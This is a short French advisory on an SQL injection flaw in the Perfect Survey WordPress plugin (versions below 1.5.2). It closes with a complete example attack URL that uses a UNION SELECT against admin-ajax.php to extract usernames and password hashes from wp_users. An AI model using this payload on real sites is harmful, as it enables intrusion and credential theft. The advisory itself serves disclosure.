Une faille critique CVE est exploitable sur le plugin WordPress Perfect Survey.
Pour info le plugin n’est plus disponible sur la plateforme wordpress à cause de la faille.
Les versions impactées sont celle < 1.5.2.
La version 1.5.2 fixe normalement le problème.
Nous sommes face à une faille de type injection SQL suite à une non vérification d’une variable sur une requête ajax.
Exemple d'atttaque sur la faille CVE Perfect Survey
https://example.com/wp-admin/admin-ajax.php?action=get_question&question_id=1%20union%20select%201%2C1%2Cchar(116%2C101%2C120%2C116)%2Cuser_login%2Cuser_pass%2C0%2C0%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%20from%20wp_users